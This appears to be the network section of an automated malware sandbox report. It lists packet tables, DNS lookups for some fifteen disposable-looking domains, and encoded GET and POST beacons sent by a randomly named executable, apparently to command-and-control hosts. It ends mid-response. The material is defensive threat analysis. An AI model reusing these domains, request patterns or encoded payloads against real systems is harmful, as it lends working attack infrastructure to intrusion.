Nov 20, 2024 04:21:34.169878006 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748506069 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748553991 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748625040 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748624086 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.748657942 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748692989 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748724937 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748748064 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.748759031 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748784065 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.748790979 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748826027 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748859882 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.748866081 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.748955011 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.753868103 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.753897905 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.753993034 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.767350912 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.767379999 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.767513990 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.839329958 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839369059 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839405060 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839437962 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839442968 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.839472055 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839507103 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.839544058 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839751959 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839785099 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839788914 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.839818954 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839850903 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839852095 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.839888096 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.839915991 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:34.840502977 CET	80	64870	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:34.840579987 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:35.673511982 CET	64870	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:36.691984892 CET	64871	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:36.697354078 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:36.697568893 CET	64871	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:36.707360983 CET	64871	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:36.712409973 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:37.210880995 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:37.210938931 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:37.210977077 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:37.210985899 CET	64871	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:37.211010933 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:37.211045980 CET	64871	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:37.211045980 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:37.211081028 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:37.211118937 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:37.211138010 CET	64871	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:37.211158991 CET	64871	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:37.215719938 CET	64871	80	192.168.2.4	216.40.34.41
Nov 20, 2024 04:21:37.220561028 CET	80	64871	216.40.34.41	192.168.2.4
Nov 20, 2024 04:21:42.275275946 CET	64872	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:42.280456066 CET	80	64872	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:42.283505917 CET	64872	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:42.295921087 CET	64872	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:42.301006079 CET	80	64872	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:42.892791033 CET	80	64872	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:42.892821074 CET	80	64872	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:42.893368006 CET	80	64872	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:42.895487070 CET	64872	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:43.798497915 CET	64872	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:44.817265034 CET	64873	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:44.822597980 CET	80	64873	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:44.826304913 CET	64873	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:44.841202021 CET	64873	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:44.846203089 CET	80	64873	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:45.445719957 CET	80	64873	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:45.445760012 CET	80	64873	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:45.445852995 CET	64873	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:45.446634054 CET	80	64873	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:45.446683884 CET	64873	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:46.345406055 CET	64873	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:47.365000963 CET	64874	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:47.370229006 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.370304108 CET	64874	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:47.398952007 CET	64874	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:47.404042006 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.404079914 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.404109001 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.404165983 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.404194117 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.404242039 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.404269934 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.404297113 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.404328108 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.977319002 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.977364063 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.977406025 CET	80	64874	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:47.977427959 CET	64874	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:47.977462053 CET	64874	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:48.907902002 CET	64874	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:49.928057909 CET	64875	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:49.933650970 CET	80	64875	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:49.933736086 CET	64875	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:49.952490091 CET	64875	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:49.957439899 CET	80	64875	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:50.548938990 CET	80	64875	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:50.548968077 CET	80	64875	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:50.549132109 CET	64875	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:50.550818920 CET	80	64875	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:50.550949097 CET	64875	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:50.553015947 CET	64875	80	192.168.2.4	188.114.96.3
Nov 20, 2024 04:21:50.557842970 CET	80	64875	188.114.96.3	192.168.2.4
Nov 20, 2024 04:21:55.766299963 CET	64876	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:21:55.772300959 CET	80	64876	85.159.66.93	192.168.2.4
Nov 20, 2024 04:21:55.772372961 CET	64876	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:21:55.793890953 CET	64876	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:21:55.799401045 CET	80	64876	85.159.66.93	192.168.2.4
Nov 20, 2024 04:21:57.306179047 CET	64876	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:21:57.311899900 CET	80	64876	85.159.66.93	192.168.2.4
Nov 20, 2024 04:21:57.311954021 CET	64876	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:21:58.317209005 CET	64877	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:21:58.322333097 CET	80	64877	85.159.66.93	192.168.2.4
Nov 20, 2024 04:21:58.325301886 CET	64877	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:21:58.339066029 CET	64877	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:21:58.343970060 CET	80	64877	85.159.66.93	192.168.2.4
Nov 20, 2024 04:21:59.845504999 CET	64877	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:21:59.851036072 CET	80	64877	85.159.66.93	192.168.2.4
Nov 20, 2024 04:21:59.851098061 CET	64877	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:00.865273952 CET	64878	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:00.870311022 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:00.870508909 CET	64878	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:00.889226913 CET	64878	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:00.894222975 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:00.894267082 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:00.894277096 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:00.894309044 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:00.894368887 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:00.894377947 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:00.894385099 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:00.894444942 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:00.894453049 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:02.392323971 CET	64878	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:02.397615910 CET	80	64878	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:02.401268005 CET	64878	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:03.443434954 CET	64879	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:03.448596954 CET	80	64879	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:03.448683977 CET	64879	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:03.462068081 CET	64879	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:03.467012882 CET	80	64879	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:04.160178900 CET	80	64879	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:04.160234928 CET	80	64879	85.159.66.93	192.168.2.4
Nov 20, 2024 04:22:04.160337925 CET	64879	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:04.163395882 CET	64879	80	192.168.2.4	85.159.66.93
Nov 20, 2024 04:22:04.168282032 CET	80	64879	85.159.66.93	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 04:18:42.436016083 CET	59970	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:18:42.877908945 CET	53	59970	1.1.1.1	192.168.2.4
Nov 20, 2024 04:18:58.301687002 CET	58849	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:18:59.305857897 CET	58849	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:18:59.312462091 CET	53	58849	1.1.1.1	192.168.2.4
Nov 20, 2024 04:18:59.608993053 CET	53	58849	1.1.1.1	192.168.2.4
Nov 20, 2024 04:19:13.099029064 CET	56380	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:19:13.160857916 CET	53	56380	1.1.1.1	192.168.2.4
Nov 20, 2024 04:19:26.289716959 CET	51259	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:19:26.397115946 CET	53	51259	1.1.1.1	192.168.2.4
Nov 20, 2024 04:19:39.756162882 CET	62399	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:19:40.066795111 CET	53	62399	1.1.1.1	192.168.2.4
Nov 20, 2024 04:19:53.912595034 CET	55737	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:19:53.936841011 CET	53	55737	1.1.1.1	192.168.2.4
Nov 20, 2024 04:20:07.255162001 CET	59097	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:20:07.294569969 CET	53	59097	1.1.1.1	192.168.2.4
Nov 20, 2024 04:20:20.819361925 CET	50639	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:20:20.883630991 CET	53	50639	1.1.1.1	192.168.2.4
Nov 20, 2024 04:20:34.271166086 CET	54314	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:20:34.790757895 CET	53	54314	1.1.1.1	192.168.2.4
Nov 20, 2024 04:20:48.068197966 CET	52185	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:20:48.121660948 CET	53	52185	1.1.1.1	192.168.2.4
Nov 20, 2024 04:21:01.449021101 CET	61127	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:21:01.490048885 CET	53	61127	1.1.1.1	192.168.2.4
Nov 20, 2024 04:21:14.757179022 CET	56736	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:21:15.237191916 CET	53	56736	1.1.1.1	192.168.2.4
Nov 20, 2024 04:21:28.801470995 CET	52389	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:21:29.045825958 CET	53	52389	1.1.1.1	192.168.2.4
Nov 20, 2024 04:21:42.227359056 CET	58590	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:21:42.268985033 CET	53	58590	1.1.1.1	192.168.2.4
Nov 20, 2024 04:21:55.568805933 CET	61718	53	192.168.2.4	1.1.1.1
Nov 20, 2024 04:21:55.763109922 CET	53	61718	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2024 04:18:42.436016083 CET	192.168.2.4	1.1.1.1	0x62e3	Standard query (0)	www.75178.club	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:18:58.301687002 CET	192.168.2.4	1.1.1.1	0xfaca	Standard query (0)	www.bcg.services	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:18:59.305857897 CET	192.168.2.4	1.1.1.1	0xfaca	Standard query (0)	www.bcg.services	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:19:13.099029064 CET	192.168.2.4	1.1.1.1	0x3ed1	Standard query (0)	www.egldfi.xyz	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:19:26.289716959 CET	192.168.2.4	1.1.1.1	0x72e8	Standard query (0)	www.betmatchx.online	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:19:39.756162882 CET	192.168.2.4	1.1.1.1	0x63e1	Standard query (0)	www.43kdd.top	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:19:53.912595034 CET	192.168.2.4	1.1.1.1	0x5203	Standard query (0)	www.lgdiamonds.info	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:20:07.255162001 CET	192.168.2.4	1.1.1.1	0xda97	Standard query (0)	www.jalan2.online	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:20:20.819361925 CET	192.168.2.4	1.1.1.1	0xee47	Standard query (0)	www.trendave.xyz	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:20:34.271166086 CET	192.168.2.4	1.1.1.1	0x5c3e	Standard query (0)	www.nb-shenshi.buzz	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:20:48.068197966 CET	192.168.2.4	1.1.1.1	0xe578	Standard query (0)	www.rysanekbeton.cloud	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:01.449021101 CET	192.168.2.4	1.1.1.1	0xf551	Standard query (0)	www.rafconstrutora.online	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:14.757179022 CET	192.168.2.4	1.1.1.1	0xfb4e	Standard query (0)	www.127358.win	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:28.801470995 CET	192.168.2.4	1.1.1.1	0x997f	Standard query (0)	www.prototype.garden	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:42.227359056 CET	192.168.2.4	1.1.1.1	0xd7c2	Standard query (0)	www.rtpwslot888gol.sbs	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:55.568805933 CET	192.168.2.4	1.1.1.1	0xe31c	Standard query (0)	www.soainsaat.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 04:18:42.877908945 CET	1.1.1.1	192.168.2.4	0x62e3	No error (0)	www.75178.club	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 04:18:42.877908945 CET	1.1.1.1	192.168.2.4	0x62e3	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 04:18:42.877908945 CET	1.1.1.1	192.168.2.4	0x62e3	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		23.167.152.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:18:59.608993053 CET	1.1.1.1	192.168.2.4	0xfaca	No error (0)	www.bcg.services		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:19:13.160857916 CET	1.1.1.1	192.168.2.4	0x3ed1	No error (0)	www.egldfi.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:19:13.160857916 CET	1.1.1.1	192.168.2.4	0x3ed1	No error (0)	www.egldfi.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:19:26.397115946 CET	1.1.1.1	192.168.2.4	0x72e8	No error (0)	www.betmatchx.online		91.206.201.136	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:19:40.066795111 CET	1.1.1.1	192.168.2.4	0x63e1	No error (0)	www.43kdd.top	43kdd.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 04:19:40.066795111 CET	1.1.1.1	192.168.2.4	0x63e1	No error (0)	43kdd.top		38.47.232.202	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:19:53.936841011 CET	1.1.1.1	192.168.2.4	0x5203	No error (0)	www.lgdiamonds.info		130.185.109.77	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:20:07.294569969 CET	1.1.1.1	192.168.2.4	0xda97	No error (0)	www.jalan2.online	jalan2.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 04:20:07.294569969 CET	1.1.1.1	192.168.2.4	0xda97	No error (0)	jalan2.online		108.181.189.7	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:20:20.883630991 CET	1.1.1.1	192.168.2.4	0xee47	No error (0)	www.trendave.xyz		203.161.42.73	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:20:34.790757895 CET	1.1.1.1	192.168.2.4	0x5c3e	No error (0)	www.nb-shenshi.buzz		161.97.168.245	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:20:48.121660948 CET	1.1.1.1	192.168.2.4	0xe578	No error (0)	www.rysanekbeton.cloud	rysanekbeton.cloud		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 04:20:48.121660948 CET	1.1.1.1	192.168.2.4	0xe578	No error (0)	rysanekbeton.cloud		81.2.196.19	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:01.490048885 CET	1.1.1.1	192.168.2.4	0xf551	No error (0)	www.rafconstrutora.online		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:01.490048885 CET	1.1.1.1	192.168.2.4	0xf551	No error (0)	www.rafconstrutora.online		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:15.237191916 CET	1.1.1.1	192.168.2.4	0xfb4e	No error (0)	www.127358.win		206.238.89.119	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:29.045825958 CET	1.1.1.1	192.168.2.4	0x997f	No error (0)	www.prototype.garden		216.40.34.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:42.268985033 CET	1.1.1.1	192.168.2.4	0xd7c2	No error (0)	www.rtpwslot888gol.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:42.268985033 CET	1.1.1.1	192.168.2.4	0xd7c2	No error (0)	www.rtpwslot888gol.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 20, 2024 04:21:55.763109922 CET	1.1.1.1	192.168.2.4	0xe31c	No error (0)	www.soainsaat.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 04:21:55.763109922 CET	1.1.1.1	192.168.2.4	0xe31c	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 04:21:55.763109922 CET	1.1.1.1	192.168.2.4	0xe31c	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.75178.club

www.bcg.services

www.egldfi.xyz

www.betmatchx.online

www.43kdd.top

www.lgdiamonds.info

www.jalan2.online

www.trendave.xyz

www.nb-shenshi.buzz

www.rysanekbeton.cloud

www.rafconstrutora.online

www.127358.win

www.prototype.garden

www.rtpwslot888gol.sbs

www.soainsaat.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	23.167.152.41	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:18:42.914311886 CET	466	OUT	GET /vl4d/?xDq=QHNq3VljPHXHL8Z+m/91IyVktX2l1Liqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym2iV1w40c0QsDnhpOyo2cx9iWMgjuEVKoVLw=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.75178.club User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	64569	199.59.243.227	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:18:59.998682976 CET	730	OUT	POST /5onp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.bcg.services Origin: http://www.bcg.services Referer: http://www.bcg.services/5onp/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 62 6a 65 49 4f 4d 75 31 77 6e 63 4a 34 52 35 49 2f 78 58 72 6d 79 44 44 38 54 41 2b 6a 65 57 76 38 68 56 50 68 33 76 48 45 64 2b 58 76 51 74 43 38 44 50 4c 6a 47 72 53 51 62 4c 33 54 4f 57 58 4a 34 39 6f 78 52 6b 54 64 53 48 2f 71 76 62 4f 68 73 7a 47 69 37 44 2f 62 42 54 68 79 6b 79 52 6c 6c 6d 62 37 76 78 61 44 55 72 70 74 68 65 4f 57 66 36 4d 52 58 39 7a 74 51 70 50 6f 41 69 36 53 7a 57 48 61 67 62 41 7a 6d 57 6f 6b 6c 6d 53 38 77 79 33 31 64 4e 30 4c 42 52 45 59 37 48 2f 47 62 71 6f 49 77 6a 72 6c 2f 71 47 4a 73 70 38 7a 56 71 2f 52 67 3d 3d Data Ascii: xDq=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31dN0LBREY7H/GbqoIwjrl/qGJsp8zVq/Rg==
Nov 20, 2024 04:19:00.469674110 CET	1236	IN	HTTP/1.1 200 OK date: Wed, 20 Nov 2024 03:18:59 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 0b96cda2-bca4-4bc1-b185-616a7b7f284b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fqNWae67EVW1IdjbyWFPyoQMLTSLCmC0uA7ZZOoFkCgrEG1Amo2sDDGXbX20y3lVxRO9DMLxp0RUskFFyC4+qw== set-cookie: parking_session=0b96cda2-bca4-4bc1-b185-616a7b7f284b; expires=Wed, 20 Nov 2024 03:34:00 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 71 4e 57 61 65 36 37 45 56 57 31 49 64 6a 62 79 57 46 50 79 6f 51 4d 4c 54 53 4c 43 6d 43 30 75 41 37 5a 5a 4f 6f 46 6b 43 67 72 45 47 31 41 6d 6f 32 73 44 44 47 58 62 58 32 30 79 33 6c 56 78 52 4f 39 44 4d 4c 78 70 30 52 55 73 6b 46 46 79 43 34 2b 71 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html 